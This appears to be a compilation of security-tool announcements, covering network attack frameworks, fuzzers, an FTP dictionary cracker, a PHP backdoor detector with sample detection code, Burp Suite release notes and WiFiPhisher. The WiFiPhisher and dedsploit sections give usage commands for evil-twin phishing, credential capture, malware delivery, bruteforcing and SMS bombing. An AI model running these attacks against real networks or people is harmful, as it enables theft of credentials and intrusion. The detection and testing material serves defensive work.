Finally, make sure the MailBoxBug data extrusion domain has a valid HTTPS certificate (Mixed content...)


dedsploit - Framework For Attacking Network Protocols


Framework for attacking network protocols and network exploitation.

I. Introduction
I don't look back anymore. I don't regret. I look forward
Aiden Pearce 
Yes, Watch Dogs has heavily influenced us when writing this framework. This entire project brought a lot of the ideals from the Watch Dogs franchise, and even actual hacking culture, to life. This framework aims to exploit and attack some common every-day vulnerabilities, whether it is a misconfiguration of an SSH server, or even the use of apache2 as a web server, which could be subjected to malicious Slowloris DoS attacks.

The framework comprises several modules, and within each module are attack vectors.

main
|
+--SSH
| +--
| |- bruteforce - bruteforce vulnerable SSH server
|
+--SMTP
| +--
| | - bruteforce - bruteforce SMTP address (aka email)
| |
| | - smsbomb - utilizes smtp-to-email gateway to spam SMS messages
|
+--HTTP
| +--
| | - arpspoof - MITM where user fakes ARP messages on LAN, intercepting packets from host
| |
| | - slowloris - Layer-7 DoS attack using slow headers and malformed GET requests to a vulnerable web server
|
+--Recon
| +--
| | - pscan - port scan with Nmap
| |
| | - hosts - scan for active hosts
|
+------

II. Installation & Usage
In order to install this program, it is best that you are on a Linux-based distro, preferably Kali Linux. You may also be on macOS, but this rollout is tentative and may be buggy.
First, git clone the repository:
git clone https://github.com/ex0dus-0x/dedsploit
Change directory, and then run the installer script (Must be root or have superuser permissions):
cd /path/to/dedsploit
sudo python installer.py
The installer.py script will install all of the necessary dependencies for you. Note that other platforms will be supported in the future (for now, manually install, especially if you don't use apt-get as a package manager).
Once finished, execute with*:
dedsploit
* if on macOS, follow the directions given at the end.
Example of the ssh bruteforce module in use:
asciicast


OONI - Open Observatory of Network Interference


OONI, the Open Observatory of Network Interference, is a global observation network whose aim is to collect high quality data using open methodologies, using Free and Open Source Software (FL/OSS) to share observations and data about the various types, methods, and amounts of network tampering in the world.
"The Net interprets censorship as damage and routes around it."
  • John Gilmore; TIME magazine (6 December 1993)
ooniprobe is the first program that users run to probe their network and to collect data for the OONI project. Are you interested in testing your network for signs of surveillance and censorship? Do you want to collect data to share with others, so that you and others may better understand your network? If so, please read this document and we hope ooniprobe will help you to gather network data that will assist you with your endeavors!

Read this before running ooniprobe!
Running ooniprobe is a potentially risky activity. This greatly depends on the jurisdiction you are in and which test you are running. It is technically possible for a person observing your internet connection to be aware of the fact that you are running ooniprobe. This means that if running network measurement tests is considered illegal in your country, then you could be spotted.
Furthermore, ooniprobe takes no precautions to protect the install target machine from forensic analysis. If the fact that you have installed or used ooniprobe is a liability for you, please be aware of this risk.

OONI in 5 minutes
The latest ooniprobe version for Debian and Ubuntu releases can be found in the deb.torproject.org package repository.
On Debian stable (jessie):
gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org jessie main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring
On Debian testing:
gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org testing main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring
On Debian unstable:
gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org unstable main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring
On Ubuntu 16.10 (yakkety), 16.04 (xenial) or 14.04 (trusty):
gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org $RELEASE main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring
Note: You'll need to swap out $RELEASE for either yakkety, xenial or trusty. This will not happen automatically. You will also need to ensure that you have the universe repository enabled. The universe repository is enabled by default in a standard Ubuntu installation but may not be on some minimal or non-standard installations.

Installation

Mac OS X
You can install ooniprobe on OSX if you have installed homebrew ( http://mxcl.github.io/homebrew ) with:
brew install ooniprobe

Unix systems (with pip)
Make sure you have installed the following dependencies:
  • build-essential
  • python (>=2.7)
  • python-dev
  • pip
  • libgeoip-dev
  • libdumbnet-dev
  • libpcap-dev
  • libssl-dev
  • libffi-dev
  • tor (>=0.2.5.1 to run all the tor related tests)
Optional dependencies:
  • obfs4proxy
On Debian-based systems this can generally be done by running:
sudo apt-get install -y build-essential libdumbnet-dev libpcap-dev libgeoip-dev libffi-dev python-dev python-pip tor libssl-dev obfs4proxy
Then you should be able to install ooniprobe by running:
sudo pip install ooniprobe
or install ooniprobe as a user:
pip install ooniprobe

Using ooniprobe
A net test is a set of measurements used to assess what kind of internet censorship is occurring.
Decks are collections of ooniprobe nettests with some associated inputs.
Collector is a service used to report the results of measurements.
Test helper is a service used by a probe for successfully performing its measurements.
Bouncer is a service used to discover the addresses of test helpers and collectors.

Configuring ooniprobe
After successfully installing ooniprobe you should be able to access the web UI on your host machine at http://localhost:8842/ .
You should now be presented with the web UI setup wizard where you can read the risks involved with running ooniprobe. Upon answering the quiz correctly you can enable or disable ooniprobe tests, set how you can connect to the measurement's collector and finally configure your privacy settings.
By default ooniprobe will not include personally identifying information in the test results, nor create a pcap file. This behavior can be customized.

Run ooniprobe as a service (systemd)
As of ooniprobe version 2.0.0 there is no need for cronjobs, as ooniprobe-agent is responsible for task scheduling.
You can ensure that ooniprobe-agent is always running by installing and enabling the systemd unit ooniprobe.service:
wget https://raw.githubusercontent.com/TheTorProject/ooni-probe/master/scripts/systemd/ooniprobe.service --directory-prefix=/etc/systemd/system
systemctl enable ooniprobe
systemctl start ooniprobe
You should be able to see a similar output if ooniprobe (systemd) service is active and loaded by running systemctl status ooniprobe:
● ooniprobe.service - ooniprobe.service, network interference detection tool
Loaded: loaded (/etc/systemd/system/ooniprobe.service; enabled)
Active: active (running) since Thu 2016-10-20 09:17:42 UTC; 16s ago
Process: 311 ExecStart=/usr/local/bin/ooniprobe-agent start (code=exited, status=0/SUCCESS)
Main PID: 390 (ooniprobe-agent)
CGroup: /system.slice/ooniprobe.service
└─390 /usr/bin/python /usr/local/bin/ooniprobe-agent start

Setting capabilities on your virtualenv python binary
If your distribution supports capabilities you can avoid needing to run OONI as root:
setcap cap_net_admin,cap_net_raw+eip /path/to/your/virtualenv's/python2

Reporting bugs
You can report bugs and issues you find with ooni-probe on The Tor Project issue tracker filing them under the "Ooni" component: https://trac.torproject.org/projects/tor/newticket?component=Ooni .
You can either register an account or use the group account "cypherpunks" with password "writecode".

Contributing
You can download the code for ooniprobe from the following git repository:
git clone https://github.com/TheTorProject/ooni-probe.git
You should then submit patches for review as pull requests to this github repository:
https://github.com/TheTorProject/ooni-probe
Read this article to learn how to create a pull request on github ( https://help.github.com/articles/creating-a-pull-request ).
If you prefer not to use github (or don't have an account), you may also submit patches as attachments to tickets.
Be sure to format the patch (given that you are working on a feature branch that is different from master) with:
git format-patch master --stdout > my_first_ooniprobe.patch

Setting up development environment
On Debian-based systems a development environment can be set up as follows (prerequisites include build essentials, python-dev, and tor; for tor see https://www.torproject.org/docs/debian.html.en ):
sudo apt-get install python-pip python-virtualenv virtualenv
sudo apt-get install libgeoip-dev libffi-dev libdumbnet-dev libssl-dev libpcap-dev
git clone https://github.com/TheTorProject/ooni-probe
cd ooni-probe
virtualenv venv
virtualenv venv will create a folder in the current directory which will contain the Python executable files, and a copy of the pip library which you can use to install other packages. To begin using the virtual environment, it needs to be activated:
source venv/bin/activate
pip install -r requirements.txt
pip install -r requirements-dev.txt
python setup.py install
ooniprobe -s # if all went well, lists available tests


FileBuster - An Extremely Fast And Flexible Web Fuzzer


An extremely fast and flexible web fuzzer.

Why another fuzzer?
My main motivation was to write a script that would allow me to fuzz a website based on a dictionary, but that also allowed me to filter the words in that dictionary based on regex patterns. This necessity came from the frustration of trying to find the pages behind the partial results returned by Soroush's IIS shortname scanner tool ( https://github.com/irsdl/iis-shortname-scanner/ ). In case you're not aware, most IIS web servers of version 7.5 or below are vulnerable to partial filename disclosure when pages are requested in 8.3 short-name format, for example: abcdef~1.zip
Many times I had results like getpag~1.asp, where you can clearly see that the page filename must be "get" followed by a word starting with "pag". This is very easily done with Filebuster:
# perl filebuster.pl -u http://yoursite.com/get{fuzz}.asp -w /path/to/wordlist.txt -p ^pag
Initially Filebuster was just this, a fuzzer with regex support but then I really invested some time on it to support various interesting features while keeping it blazing fast.

Why is it so fast?
Filebuster was built based on one of the fastest HTTP classes in the world (of PERL) - Furl::HTTP. Also the thread modelling is a bit optimized to run as fast as possible.

Features
It packs a ton of features like:
  • The already mentioned Regex patterns
  • Supports HTTP/HTTPS/SOCKS proxy
  • Allows for multiple wordlists using wildcards
  • Additional file extensions
  • Adjustable timeouts and retries
  • Adjustable delays / throttling
  • Hide results based on HTTP code, length or words in headers or body
  • Support for custom cookies
  • Support for custom headers
  • Supports multiple versions of the TLS protocol
  • Automatic TTY detection
  • Recursive scans
  • Integrated wordlists

Requisites
Perl version 5.10 or higher is required
Filebuster outsources a lot of features to third-party libraries. However, they can be easily installed with the following command:
# cpan install YAML Furl Switch Benchmark Cache::LRU Net::DNS::Lite List::MoreUtils IO::Socket::SSL URI::Escape HTML::Entities IO::Socket::Socks::Wrapper

Installation
Filebuster is a Perl script so no installation is necessary. However, the best way of using filebuster is by creating a soft link on a directory that is included in the path. For example:
# ln -s /path/to/filebuster.pl /usr/local/bin/filebuster
Then you will be able to use it system-wide.

Syntax
On the most basic form, Filebuster can be run using the following syntax:
# perl filebuster.pl -u http://yoursite.com/ -w /path/to/wordlist.txt
If you want to fuzz the final part of the URL, then you don't need to use the {fuzz} tag to indicate where to inject.
A more complex example:
# perl filebuster.pl -u http://yoursite.com/{fuzz}.jsp -w /path/to/wordlist.txt -t 3 -x http://127.0.0.1:8080 --hs "Error"
This would allow you to fuzz a website with 3 threads to find JSP pages, using a local proxy and hiding all responses with "Error" in the body.
For the complete syntax help with examples, just run filebuster.pl --help .

Wordlists
I've created some wordlists based on different sources around the web for your convenience. You can find them on the wordlists directory. This means you can start using FileBuster right away:
# perl filebuster.pl -u http://yoursite.com/ -w wordlists/normal.txt
If you need more wordlists, you should check out the great SecLists repository.



FTP Password Recovery - Command-line Lost or Forgotten FTP Password Finder Tool for Windows


FTP Password Recovery is a free command-line tool to find your lost or forgotten FTP password for any FTP server.
It automatically detects if the target FTP server allows Anonymous (password-less) connections. If your FTP server is running on a different port (other than port 21), you can specify it in the tool along with the server IP address.
It uses a simple dictionary-based password recovery method. By default it includes a sample dictionary (password list) file containing common FTP login passwords. However, you can find good collections of password dictionaries (also called wordlists) here & here.
For complex passwords, you can use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with this tool.


Features
  • Free tool to recover the lost or Forgotten FTP password
  • Remotely recover your password for any FTP server
  • Option to specify non-standard FTP port
  • Automatically detects any Anonymous users
  • Uses a simple & quick Dictionary Crack method
  • Includes password dictionary file having common FTP passwords
  • Copies the recovered FTP password to clipboard
  • Includes Installer for local Installation & Uninstallation

Installation & Un-installation
FTP Password Recovery comes with an Installer to help with local installation & un-installation. This installer has an intuitive wizard that guides you through a series of steps to complete the installation.
At any point of time, you can uninstall the product using the Uninstaller located at the following location (by default):
[Windows 32 bit]
C:\Program Files\SecurityXploded\FTPPasswordRecovery
[Windows 64 bit]
C:\Program Files (x86)\SecurityXploded\FTPPasswordRecovery

How to use?
FTP Password Recovery is a console-based tool, so it must be launched from the command prompt.
Here is the general usage information:
FTPPasswordRecovery.exe -i <ipaddress> -p <port> -u <username> -f <passlist_file>

Example of FTP Password Recovery
// Perform FTP Password Recovery using Password List file
FTPPasswordRecovery.exe -i "192.168.1.1" -p 21 -u "administrator" -f "c:\passlist.txt"


BackdoorMan - Toolkit That Helps You Find Malicious, Hidden And Suspicious PHP Scripts And Shells


A Python open source toolkit that helps you find malicious, hidden and suspicious PHP scripts and shells in a chosen destination; it automates the process of detecting them.

Purpose
The main purpose of BackdoorMan is to help web-masters and developers discover malicious scripts in their site files, because it is quite common for hackers to place a back-door on a site they have hacked. A back-door can give the hacker continued access to the site even if the site owners change account passwords. Back-door scripts vary from hundreds of lines of code to 1 or 2 lines and can be hidden among hundreds of files, which makes them very hard to discover, especially if the back-door is inactive. There are common ways and tools that can be used, including grep, but BackdoorMan automates all the above as described earlier and makes it even easier (at least I hope so).

Features
  • Shell detection by filename using a shell signature database.
  • Recognition of web back-doors.
  • Detect the use of suspicious PHP functions and activities.
  • Use of external services in addition to its own checks.
  • Use of the nimbusec shellray API (free online webshell detection for PHP files, https://shellray.com ).
    • Very high recognition performance for webshells.
    • Check suspicious PHP files online.
    • Easy, fast and reliable.
    • Classification for webshells with behavior classification.
    • Free service of nimbusec.
  • Use of VirusTotal Public API (free online service that analyzes files and facilitates the quick detection of viruses, worms, trojans and all kinds of malware), it can be useful in our situation.
  • Use of UnPHP (The online PHP decoder: UnPHP is a free service for analyzing obfuscated and malicious PHP code) www.unphp.net . Very useful in our situation.
    • Eval + gzinflate + Base64.
    • Recursive De-Obfuscating.
    • Custom Function and Regex Support.

Requirements
  • requests module

Version
v2.3.1

Author
Yassine Addi

Usage
Usage: BackdoorMan [options] destination1 [destination2 ...]

A toolkit that helps you find malicious, hidden and suspicious PHP scripts and shells in a chosen destination.
Author: Yassine Addi <yassineaddi.dev(at)gmail(dot)com>.
NOTE: This tool does not require Internet connection but it is highly recommended to benefit from all features.

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-o OUTPUT, --output=OUTPUT
save output in a file
--no-color do not use colors in the output
--no-info do not show file information
--no-apis do not use APIs during scan (not recommended)

Changelog
v1.0.0 - 1st release <https://github.com/yassineaddi/PHP-backdoor-detector>.
v2.0.0 - rename software to `BackdoorMan`.
       - improve external services (APIs).
       - separate databases from main script.
       - lot of improvements (compare with 1st release).
v2.1.0 - separate script to classes to optimize the software.
v2.2.0 - add `Servicer` class.
       - rename classes.
       - add `--no-color` option.
       - add `--no-external-services` option.
       - add `--no-file-info` option.
       - improve `Reporter` class.
       - improve software interface.
       - small improvements.
       - remove single-line and multi-line comments before scanning.
       - add `--force` option.
       - add UnPHP API.
       - improve `activities.txt` database.
v2.2.1 - modify comments.
v2.3.1 - use of custom parser instead of reg-ex to detect backticks (execution operator) due to false positives.
       - improved report class.
       - separate functions and activities to low, medium and high...
       - rename options.
       - add `-o, --output` option.
       - add/modify comments.
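As an added example (not BackdoorMan's own code), the following Python sketches the detection stages described in the feature list and the changelog above: set comments aside before scanning, match suspicious functions grouped by severity, and detect the backtick execution operator with a small tokenizer rather than a regex so that quoted strings and commented-out code do not produce false positives. The function lists and the PHP sample are constructed for the example, not BackdoorMan's shipped databases.

```python
"""Staged PHP backdoor-indicator scan in the spirit of BackdoorMan.

Added example, not BackdoorMan's own code.  Stages:
  1. tokenize the source so comments and quoted strings are set aside,
  2. flag calls to suspicious functions, grouped by severity,
  3. report the backtick execution operator only where it occurs in code.
Not handled: heredoc/nowdoc strings, concatenated or variable function
names such as "ev"."al" or $f = "system"; $f(...).
"""
import re

# Constructed sample lists, not BackdoorMan's shipped databases.
SUSPICIOUS_FUNCTIONS = {
    "high": {"eval", "assert", "system", "passthru", "shell_exec", "exec",
             "popen", "proc_open", "create_function"},
    "medium": {"base64_decode", "gzinflate", "gzuncompress", "str_rot13"},
    "low": {"file_get_contents", "fsockopen", "chmod"},
}

# identifier immediately followed by "(" -- a (possibly variable) call
CALL_RE = re.compile(r"\b([A-Za-z_][A-Za-z0-9_]*)\s*\(")


def tokenize_php(src):
    """Split PHP source into (kind, text) tokens.

    kind is "code", "string" ('...' or "..."), "exec" (the text between
    backticks) or "comment" (// # /* */).  Quote scanning skips backslash
    escapes so an escaped delimiter does not end the token early.
    """
    tokens, buf = [], []
    i, n = 0, len(src)

    def flush():
        if buf:
            tokens.append(("code", "".join(buf)))
            buf.clear()

    while i < n:
        c = src[i]
        if c in "'\"`":
            flush()
            j = i + 1
            while j < n and src[j] != c:
                j += 2 if src[j] == "\\" else 1
            tokens.append(("exec" if c == "`" else "string", src[i + 1:j]))
            i = j + 1
        elif src.startswith("/*", i):
            flush()
            end = src.find("*/", i + 2)
            end = n if end == -1 else end + 2
            tokens.append(("comment", src[i:end]))
            i = end
        elif src.startswith("//", i) or c == "#":
            flush()
            end = src.find("\n", i)  # the newline itself stays in the code
            end = n if end == -1 else end
            tokens.append(("comment", src[i:end]))
            i = end
        else:
            buf.append(c)
            i += 1
    flush()
    return tokens


def scan_php(src):
    """Return {"high": set, "medium": set, "low": set, "exec": list}.

    Only "code" tokens are searched for function calls, and only "exec"
    tokens count as use of the execution operator.
    """
    report = {level: set() for level in SUSPICIOUS_FUNCTIONS}
    report["exec"] = []
    for kind, text in tokenize_php(src):
        if kind == "exec":
            report["exec"].append(text)
        elif kind == "code":
            for match in CALL_RE.finditer(text):
                name = match.group(1).lower()
                for level, names in SUSPICIOUS_FUNCTIONS.items():
                    if name in names:
                        report[level].add(name)
    return report


# Constructed sample: the commented-out and quoted occurrences are decoys.
SAMPLE_PHP = r"""<?php
// eval($_GET['c']);   commented out, must not be flagged
/* system("id"); also commented out */
$msg = "Run eval() and `id` safely in a string";
$p = base64_decode($_POST['p']);
@eval(gzinflate($p));
$out = `ls -la $_GET['d']`;
echo $out;
"""

if __name__ == "__main__":
    result = scan_php(SAMPLE_PHP)
    for level in ("high", "medium", "low"):
        print("%-6s %s" % (level, sorted(result[level])))
    print("exec   %r" % result["exec"])
```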


Burp Suite Professional 1.7.14 - The Leading Toolkit for Web Application Security Testing


Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.


Burp Suite contains the following key components:
  • An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
  • An application-aware Spider, for crawling content and functionality.
  • An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
  • An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
  • A Repeater tool, for manipulating and resending individual requests.
  • A Sequencer tool, for testing the randomness of session tokens.
  • The ability to save your work and resume working later.
  • Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.

Release Notes v1.7.14

This release fixes the following security issues that were identified through our bug bounty program. Note that all of these issues involve the Burp user actively testing a malicious website that has been designed specifically to attack Burp Suite.

  • If a user visits a malicious website in their browser, and in Burp selects a crafted request that was generated by that website, and uses either the "Request in browser" function or the "Generate CSRF PoC" and "Test in browser" function, then the malicious website can XSS an arbitrary website.
  • If a user scans a malicious website and another website within the same Burp project, and exports all of the scan results as a single HTML report, and views that report in a browser, then the malicious website can capture the scan results for the other site.
  • If a user scans a malicious website and another website within the same Burp project, then the malicious website might be able to capture the raw data of any Burp Collaborator interactions that were performed by the other website.
We are pleased that our bug bounty program has alerted us to these issues within Burp. As well as fixing known issues at source, we have taken a defense-in-depth approach to hardening Burp in response to them, including:

  • Some functions within Burp's in-browser interface that increased its attack surface have been removed altogether, including the Proxy history, the buttons to repeat requests and view responses, and support for the plug-n-hack Firefox extension.
  • Scan issue descriptions, including those generated by Burp extensions, are now subject to an HTML whitelist that allows only formatting tags and simple hyperlinks.
  • HTML scan reports now include a Content Security Policy directive that prevents execution of scripts in modern browsers.
Note: The security issues identified have all been fixed within Burp Suite. As a defense-in-depth measure, some hardening has also been performed of Burp Collaborator. It is recommended that users who have deployed a private Burp Collaborator server should update to the current version in a timely way.

A number of other enhancements were made, including:

  • A number of improvements to existing Scanner checks to improve accuracy.
  • When a request is sent to Repeater but never issued, the request is now stored in the Burp project file, so the initial unrequested item will reappear when the project is reopened.
  • The Proxy listener now accepts SSL negotiations from browsers that are hardened only to support selected protocols and ciphers.


PyJFuzz - Python JSON Fuzzer



PyJFuzz is a small, extensible and ready-to-use framework used to fuzz JSON inputs, such as mobile REST API endpoints, JSON implementations, browsers, CLI executables and much more.

Version 1.1.0
Homepage http://www.mseclab.com/
Github https://github.com/mseclab/PyJFuzz
Author Daniele Linguaglossa ( @dzonerzy )
License MIT - (see LICENSE file)

Installation
Dependencies
PyJFuzz needs a single dependency, bottle, which is installed automatically by setup.py.
Installation
You can install PyJFuzz with the following command:
git clone https://github.com/mseclab/PyJFuzz.git && cd PyJFuzz && sudo python setup.py install

Documentation and Examples
CLI tool
Once installed PyJFuzz will create both a python library and a command-line utility called pjf (screenshot below)



Library
PyJFuzz can also work as a library; you can import it in your project as follows:
from pyjfuzz.lib import *
Classes
The available objects/classes are the following:
  • PJFServer - Used to start and stop the built-in HTTP and HTTPS servers
  • PJFProcessMonitor - Used to monitor a process for crashes; it automatically restarts the process each time it crashes
  • PJFTestcaseServer - The testcase server is used in conjunction with PJFProcessMonitor; whenever a process crashes, the testcase server registers and stores the JSON which caused the crash
  • PJFFactory - The main object used to do the real fuzzing of JSON objects
  • PJFConfiguration - The configuration object for each of the available objects
  • PJFExternalFuzzer - Used by PJFFactory; an auxiliary class that provides an interface to other command-line fuzzers such as radamsa
  • PJFMutation - Used by PJFFactory; provides all the mutations used during a fuzzing session
  • PJFExecutor - Provides an interface to interact with external processes

Examples
Below are some trivial examples of how to implement a PyJFuzz-powered program.
simple_fuzzer.py
from argparse import Namespace
from pyjfuzz.lib import *

# Build a configuration for the JSON object to fuzz and create the factory
config = PJFConfiguration(Namespace(json={"test": ["1", 2, True]}, nologo=True, level=6))
fuzzer = PJFFactory(config)
while True:
    # Each access to fuzzer.fuzzed yields a new mutated JSON document
    print(fuzzer.fuzzed)
simple_server.py
from argparse import Namespace
from pyjfuzz.lib import *

config = PJFConfiguration(Namespace(json={"test": ["1", 2, True]}, nologo=True, level=6, debug=True, indent=True))
PJFServer(config).run()
Sometimes you may need to modify standard, non-customizable settings such as the HTTP or HTTPS server port; this can be done in the following way:
from argparse import Namespace
from pyjfuzz.lib import *

config = PJFConfiguration(Namespace(json={"test": ["1", 2, True]}, nologo=True, level=6, indent=True))
print(config.ports["servers"]["HTTP_PORT"])   # 8080
print(config.ports["servers"]["HTTPS_PORT"])  # 8443
print(config.ports["servers"]["TCASE_PORT"])  # 8888
config.ports["servers"]["HTTPS_PORT"] = 443   # Change HTTPS port to 443
Remember: when changing default ports, you should always handle the exceptions caused by missing privileges!
Below is a comprehensive list of all available settings / customizations of the PJFConfiguration object:
Configuration table (name (type) - description):
  • json (dict) - JSON object to fuzz
  • json_file (str) - Path to a JSON file
  • parameters (list<str>) - List of parameters to fuzz (taken from the JSON object)
  • techniques (list<int>) - List of polyglot attacks used to generate fuzzed JSON, such as XSS, LFI etc. They are in the range 0-13 (see the techniques table)
  • level (int) - Fuzzing level in the range 0-6
  • utf8 (bool) - If true, switch from unicode encoding to pure byte representation
  • indent (bool) - Set whether to indent the result object
  • url_encode (bool) - Set whether to URL-encode the result object
  • strong_fuzz (bool) - Set whether to use strong fuzzing (strong fuzzing will not maintain the JSON structure; useful for parser fuzzing)
  • debug (bool) - Set whether to enable debug prints
  • exclude (bool) - Exclude from fuzzing the parameters selected by the parameters option
  • notify (bool) - Set whether to notify the process monitor when a crash occurs; only used with PJFServer
  • html (str) - Path to an HTML directory to serve within PJFServer
  • ext_fuzz (bool) - Set whether to use the binary from "command" as an external fuzzer
  • cmd_fuzz (bool) - Set whether to use the binary from "command" as the fuzzer target
  • content_type (str) - Set the content type of the PJFServer result (default application/json)
  • command (list<str>) - Command to execute; each parameter is a list element, you can use shlex.split from Python
Techniques table (index - description):
  • 0 - XSS injection (Polyglot)
  • 1 - SQL injection (Polyglot)
  • 2 - LFI attack
  • 3 - SQL injection polyglot (2)
  • 4 - XSS injection (Polyglot) (2)
  • 5 - RCE injection (Polyglot)
  • 6 - LFI attack (2)
  • 7 - Data URI attack
  • 8 - LFI and HREF attack
  • 9 - Header injection
  • 10 - RCE injection (Polyglot) (2)
  • 11 - Generic template injection
  • 12 - Flask template injection
  • 13 - Random character attack

Screenshots
Below are some screenshots, just to let you know what you should expect from PyJFuzz.



Built-in tool
PyJFuzz is shipped with a built-in tool called PyJFuzz Web Fuzzer. This tool provides an automatic fuzzing console via HTTP and HTTPS servers; it can be used to easily fuzz almost any web browser, even when you can't control the process state!
There are two switches used to launch this tool (--browser-auto and --fuzz-web): the first one performs an automatic browser restart when a crash occurs, the other one tries to detect when a browser doesn't make requests anymore. Both of them always save the testcases; below are some screenshots.




End
Thanks for using PyJFuzz!
Happy Fuzzing from mseclab


WiFiPhisher v1.2 - Automated victim-customized phishing attacks against Wi-Fi clients


Wifiphisher is a security tool that mounts automated victim-customized phishing attacks against WiFi clients in order to obtain credentials or infect the victims with malware. It is primarily a social engineering attack that, unlike other methods, does not include any brute forcing. It is an easy way of obtaining credentials from captive portals and third party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys.
Wifiphisher works on Kali Linux and is licensed under the GPL license.

How it works
After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.
From the victim's perspective, the attack consists of three phases:
  1. Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by forging “Deauthenticate” or “Disassociate” packets to disrupt existing associations.
  2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will eventually start connecting to the rogue access point. After this phase, the victim is MiTMed.
  3. Victim is being served a realistic, specially-customized phishing page. Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials or serves malware. This page will be specifically crafted for the victim. For example, a router config-looking page will contain logos of the victim's vendor. The tool supports community-built templates for different phishing scenarios.
Performing MiTM attack

Requirements
Following are the requirements for getting the most out of Wifiphisher:
  • Kali Linux. Although people have made Wifiphisher work on other distros, Kali Linux is the officially supported distribution, thus all new features are primarily tested on this platform.
  • One wireless network adapter that supports AP mode. Drivers should support netlink.
  • One wireless network adapter that supports Monitor mode and is capable of injection. Again, drivers should support netlink. If a second wireless network adapter is not available, you may run the tool with the --nojamming option. This will turn off the de-authentication attack though.

Installation
To install the latest development version type the following commands:
git clone https://github.com/sophron/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies (Currently, hostapd, PyRIC, jinja2)
Alternatively, you can download the latest stable version from the Releases page .

Usage
Run the tool by typing wifiphisher or python bin/wifiphisher (from inside the tool's directory).
By running the tool without any options, it will find the right interfaces and interactively ask the user to pick the ESSID of the target network (out of a list with all the ESSIDs in the surrounding area) as well as a phishing scenario to perform.

wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade
Use wlan0 for spawning the rogue Access Point and wlan4 for DoS attacks. Select the target network manually from the list and perform the "Firmware Upgrade" scenario.
Useful for manually selecting the wireless adapters. The "Firmware Upgrade" scenario is an easy way of obtaining the PSK from a password-protected network.

wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd
Automatically pick the right interfaces. Target the Wi-Fi with ESSID "CONFERENCE_WIFI" and perform the "Plugin Update" scenario. The Evil Twin will be password-protected with PSK "s3cr3tp4ssw0rd".
Useful against networks with disclosed PSKs (e.g. in conferences). The "Plugin Update" scenario provides an easy way of getting the victims to download malicious executables (e.g. malware containing a reverse shell payload).

wifiphisher --nojamming --essid "FREE WI-FI" -p oauth-login
Do not target any network. Simply spawn an open Wi-Fi network with ESSID "FREE WI-FI" and perform the "OAuth Login" scenario.
Useful against victims in public areas. The "OAuth Login" scenario provides a simple way to capture credentials from social networks, like Facebook.
Following are all the options along with their descriptions (also available with wifiphisher -h ):
Short form Long form Explanation
-h --help show this help message and exit
-s SKIP --skip SKIP Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA
-jI JAMMINGINTERFACE --jamminginterface JAMMINGINTERFACE Manually choose an interface that supports monitor mode for deauthenticating the victims. Example: -jI wlan1
-aI APINTERFACE --apinterface APINTERFACE Manually choose an interface that supports AP mode for spawning an AP. Example: -aI wlan0
-t TIMEINTERVAL --timeinterval TIMEINTERVAL Choose the time interval between DEAUTH packets being sent
-dP DEAUTHPACKETS --deauthpackets DEAUTHPACKETS Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -dP 2
-d --directedonly Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs
-nJ --nojamming Skip the deauthentication phase. When this option is used, only one wireless interface is required
-e ESSID --essid ESSID Enter the ESSID of the rogue Access Point. This option will skip Access Point selection phase. Example: --essid 'Free WiFi'
-p PHISHINGSCENARIO --phishingscenario PHISHINGSCENARIO Choose the phishing scenario to run. This option will skip the scenario selection phase. Example: -p firmware_upgrade
-pK PRESHAREDKEY --presharedkey PRESHAREDKEY Add WPA/WPA2 protection on the rogue Access Point. Example: -pK s3cr3tp4ssw0rd

Screenshots

